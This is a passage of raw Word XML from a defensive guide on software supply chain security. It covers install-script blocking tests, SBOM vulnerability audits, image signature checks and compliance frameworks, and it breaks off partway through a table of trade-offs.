        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Vulnerable Function Call Mapping Tests:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> If a temporary mitigation strategy involves avoiding a specific vulnerable code path inside a necessary third-party dependency, write static analysis or unit tests that explicitly scan the codebase for calls to that specific component method. The test acts as a regression guard, asserting that the codebase throws a compilation or linting exception if a developer accidentally invokes the unhardened function.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C2910EF" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="92"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Malicious Script Execution Blocks:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Create integration tests that simulate a fresh package installation within an isolated container runner environment. The test should assert that package managers (like </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>npm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>pip</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> ) are run with flags that explicitly disable execution scripts (e.g., </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>npm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t xml:space="preserve"> install --ignore-scripts</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> ), validating that upstream post-install injection vectors are rendered entirely inert.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E7B9230"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Infrastructure &amp; Pipeline Verification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A434E5" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="93"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>SBOM Integrity Audits:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Integrate tools like </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Grype</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Trivy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> directly into the post-build phase of the CI/CD pipeline. The verification script must programmatically extract the generated Software Bill of Materials (SBOM) and query vulnerability databases. The pipeline execution check must assert a zero-tolerance policy, instantly blocking the build if any direct or transitive component matches a high-severity CVE.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="678E1FF6" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="93"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Cryptographic Attestation Verification:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Write </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>an</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> deployment-gate test (e.g., a Kubernetes admission controller policy via OPA Gatekeeper) that inspects container images before they pull down into clusters. The policy must verify the image's digital signature against trusted enterprise public keys (using tools like </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Sigstore</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>/Cosign</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> ). If the signature or provenance data is missing or mismatched, the system must drop the deployment, proving the supply chain boundary works.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="526D1A5A" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>2. Compliance Standards &amp; Regulatory Frameworks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E98BD72"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Because software supply chains inherit structural risks from the global open-source ecosystem, modern regulatory structures have heavily tightened constraints around software origin, tracking, and composition auditing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A89496"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PCI-DSS v4.0 (Payment Card Industry Data Security Standard)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5258ED9F" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="94"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Requirement 6.3.2:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Explicitly mandates that organizations maintain an inventoried listing of all bespoke and custom software components, including third-party software components and open-source libraries integrated into the payment application infrastructure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38A0D044" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="94"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Requirement 6.4.1:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Dictates that public-facing web applications must be continually protected against vulnerabilities, requiring software composition reviews and automated patch management strategies to rapidly address flaws within runtime dependencies before they can be exploited.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C62A2F0"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SOC 2 Type II (Trust Services Criteria)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F1189AF" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="95"/>
        </w:numPr>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>CC7.1 &amp; CC7.4 (Operation and Change Management):</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Requires service organizations to prove they maintain strict configuration management controls over infrastructure components. Auditors require documented processes showing how the business screens third-party software updates for malicious code, tracks software modifications, and mitigates vulnerabilities introduced via systemic platform integrations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EDBD6C4"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ISO/IEC 27001:2022</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72CAEF06" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="96"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Control A.5.23 (Information Security for Use of Cloud Services):</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Demands the establishment and tracking of clear processes for managing the security risks associated with cloud infrastructure, software plugins, and third-party SaaS integrations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E40A081" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="96"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Control A.8.30 (Outsourced Development):</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Explicitly requires organizations to define and enforce secure coding standards and trace the integrity of all software components delivered by external entities or open-source environments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="405A6149"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NIST SP 800-53 (Rev. 5) &amp; Secure Software Development Framework (SSDF)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66530110" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="97"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>SA-12 (Supply Chain Protection):</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> A comprehensive, dedicated control mandating that agencies protect information systems and components throughout the entire supply chain, utilizing rigorous provenance verification and supplier risk assessments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="195CB0F6" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="97"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>SR-3 &amp; SR-4 (Supply Chain Risk Management):</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Requires continuous monitoring of the supply chain ecosystem, including the regular generation, ingestion, and validation of cryptographic </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Software Bills of Materials (SBOMs)</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> to verify code authenticity before deployment into high-assurance environments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13FD814C" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Operational &amp; Team Impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F55EF5C" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>1. The "Fix" Trade-offs: Balancing Security with Usability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ECCA9D0"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 xml:space="preserve">Deploying a rigorous, zero-trust defense framework against software supply chain failures does not heavily drain CPU or memory at runtime. Instead, the friction shifts to </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>developer velocity</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> and the </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>operational deployment pipeline</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> . Enforcing absolute validation can create a bottleneck if not architected smoothly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C9B611D"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The following matrix highlights these impacts and the strategies used to balance them:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="PlainTable1"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1759"/>
        <w:gridCol w:w="3146"/>
        <w:gridCol w:w="3840"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D66BA1" w:rsidRPr="0083079C" w14:paraId="057D4C09" w14:textId="77777777" w:rsidTr="00B064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E95320" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Hardening</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Action</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1526D84E" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Potential Impact / Friction</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0E44EE79" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>The Balanced Solution</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D66BA1" w:rsidRPr="0083079C" w14:paraId="475F4845" w14:textId="77777777" w:rsidTr="00B064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DAB1F6" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve">Strict </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Lockfile</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Hashing &amp;</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Immutable</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
